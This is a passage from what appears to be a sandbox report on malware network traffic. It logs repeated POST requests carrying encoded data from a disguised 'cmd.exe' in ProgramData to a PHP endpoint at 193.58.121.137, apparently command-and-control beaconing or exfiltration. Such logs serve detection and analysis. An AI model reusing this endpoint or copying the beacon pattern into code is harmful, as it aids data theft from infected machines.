59	192.168.2.4	49998	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:32.501857996 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:32.857111931 CET	2560	OUT	Data Raw: 5f 57 5c 52 5c 44 5f 56 5a 5c 55 51 59 5a 54 56 56 5b 5d 41 50 5c 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _W\R\D_VZ\UQYZTVV[]AP\ZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)0 3>Y'7"%,3+>8<4>$>5R)0<,5%Y 'S<='_!%Y)7
Jan 3, 2025 20:48:33.167386055 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:33.300152063 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	50008	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:34.132802963 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2552 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:34.486675024 CET	2552	OUT	Data Raw: 5f 52 5c 59 59 4a 5a 50 5a 5c 55 51 59 5e 54 5b 56 50 5d 45 50 50 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _R\YYJZPZ\UQY^T[VP]EPPZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+X0>=]1',$\>=<&P%X**0/Z:1\7$/T('_!%Y)
Jan 3, 2025 20:48:34.811043978 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:34.942147017 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	50014	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:35.067047119 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:35.419471025 CET	2560	OUT	Data Raw: 5a 51 59 59 59 41 5f 52 5a 5c 55 51 59 5f 54 5b 56 59 5d 41 50 57 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZQYYYA_RZ\UQY_T[VY]APWZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?0;X&.*&%&<3(7?:V%9S)U0:5 R(-'_!%Y)#
Jan 3, 2025 20:48:35.739481926 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:35.870773077 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	50024	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:36.400163889 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:36.747652054 CET	2560	OUT	Data Raw: 5f 5e 59 58 59 4a 5a 51 5a 5c 55 51 59 5c 54 54 56 51 5d 46 50 5c 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _^YXYJZQZ\UQY\TTVQ]FP\ZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&('0[2'%Z1+?[?<4*V1V)#^-9_7'?'_!%Y)/
Jan 3, 2025 20:48:37.102171898 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:37.232892990 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	50031	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:37.358730078 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:37.716480017 CET	2560	OUT	Data Raw: 5a 54 59 5d 5c 40 5a 51 5a 5c 55 51 59 57 54 57 56 5f 5d 46 50 57 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZTY]\@ZQZ\UQYWTWV_]FPWZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F('$X)X%%X1Z<$<7>W&>*9%24W+'_!%Y)
Jan 3, 2025 20:48:38.058448076 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:38.190577984 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	50037	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:38.314965963 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:38.695087910 CET	2560	OUT	Data Raw: 5f 54 5c 52 59 4b 5a 56 5a 5c 55 51 59 5d 54 57 56 5e 5d 45 50 5c 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _T\RYKZVZ\UQY]TWV^]EP\ZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%(383>!Y1&'/0Y<=,+B5&=39!X4+?='_!%Y)+
Jan 3, 2025 20:48:38.959419966 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:39.088438034 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	50043	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:39.174160004 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1884 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:39.541240931 CET	1884	OUT	Data Raw: 5f 57 5c 5b 59 43 5a 50 5a 5c 55 51 59 5b 54 52 56 51 5d 44 50 53 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _W\[YCZPZ\UQY[TRVQ]DPSZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F)0<3.Y%&3?=+<:P&9>U3Y9%7'8+'_!%Y)3
Jan 3, 2025 20:48:39.854091883 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:40.001188993 CET	380	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:39 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 09 1e 25 07 27 18 3c 57 33 38 3c 0a 27 14 36 1b 2a 3f 3f 0b 39 32 2c 5e 36 03 27 54 2a 33 02 10 3d 3f 2c 5a 21 11 3d 08 21 11 0f 58 3f 00 23 5b 03 1d 21 01 35 0c 2e 1d 25 17 29 13 2f 30 3f 1c 26 04 39 12 28 58 35 15 23 3e 2a 54 36 3e 34 56 2d 33 3e 03 26 2c 2c 06 3c 03 26 1e 26 2f 21 51 00 10 39 57 27 33 26 01 24 05 26 12 26 03 3d 5b 33 1b 3f 59 36 2f 3d 08 31 3b 21 10 2f 21 27 0f 25 32 0e 56 21 0d 3f 07 3e 3a 35 51 32 3b 22 5f 2a 01 20 52 00 31 5c 51 Data Ascii: %'<W38<'6??92,^6'T3=?,Z!=!X?#[!5.%)/0?&9(X5#>T6>4V-3>&,,<&&/!Q9W'3&$&&=[3?Y6/=1;!/!'%2V!?>:5Q2;"_ R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	50045	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:39.263926029 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:39.608553886 CET	2560	OUT	Data Raw: 5f 54 59 59 5c 40 5f 55 5a 5c 55 51 59 59 54 56 56 5e 5d 47 50 52 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _TYY\@_UZ\UQYYTVV^]GPRZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B?0X0>2')['<+=/<"1=V= 3Z.& 7R?'_!%Y)
Jan 3, 2025 20:48:39.911752939 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:40.045159101 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	50052	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:40.173005104 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:40.529149055 CET	2560	OUT	Data Raw: 5f 56 5c 59 59 42 5f 52 5a 5c 55 51 59 57 54 50 56 50 5d 45 50 55 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _V\YYB_RZ\UQYWTPVP]EPUZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%A(''X:2'2,,[>.$<$:T&-&*3'[.6%^4W)-'_!%Y)
Jan 3, 2025 20:48:40.855581045 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:40.986073017 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	50058	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:41.112837076 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:41.466485977 CET	2560	OUT	Data Raw: 5f 5f 5c 5c 59 41 5a 5b 5a 5c 55 51 59 5a 54 5a 56 51 5d 40 50 5c 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: __\\YAZ[Z\UQYZTZVQ]@P\Z[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%A<<$!Y%6&?U<4Q& 3^-> 70('_!%Y)7
Jan 3, 2025 20:48:41.760885000 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:41.892513037 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50071	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:43.154392958 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2552 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:43.514444113 CET	2552	OUT	Data Raw: 5a 54 5c 5b 59 41 5a 57 5a 5c 55 51 59 5e 54 57 56 5e 5d 46 50 5d 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZT\[YAZWZ\UQY^TWV^]FP]ZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(#,'14!]1++-<?'V%*>3-%"740)='_!%Y)7
Jan 3, 2025 20:48:43.812465906 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:43.953830957 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	50077	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:44.084906101 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:44.437975883 CET	2560	OUT	Data Raw: 5a 54 59 5d 5c 43 5a 55 5a 5c 55 51 59 5f 54 56 56 51 5d 44 50 50 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZTY]\CZUZ\UQY_TVVQ]DPPZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%@(8$="12/<>+P($Q$..U?9#/<-'_!%Y)#
Jan 3, 2025 20:48:44.768383980 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:44.900430918 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50080	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:45.070342064 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:45.421741962 CET	2560	OUT	Data Raw: 5a 54 59 5a 59 43 5a 52 5a 5c 55 51 59 57 54 56 56 5a 5d 44 50 51 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZTYZYCZRZ\UQYWTVVZ]DPQZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F+^3.:%62/7<-/P)$6Q$>%)3 .5:"'(-'_!%Y)
Jan 3, 2025 20:48:45.729258060 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:45.865762949 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50081	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:46.002002001 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:46.357141972 CET	2560	OUT	Data Raw: 5a 55 5c 5f 5c 43 5f 55 5a 5c 55 51 59 57 54 5a 56 5c 5d 44 50 52 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZU\_\C_UZ\UQYWTZV\]DPRZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(&>9Y%!1Z(](7T<6P%)R=0 :%2#$/V+'_!%Y)
Jan 3, 2025 20:48:46.671683073 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:46.809292078 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50082	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
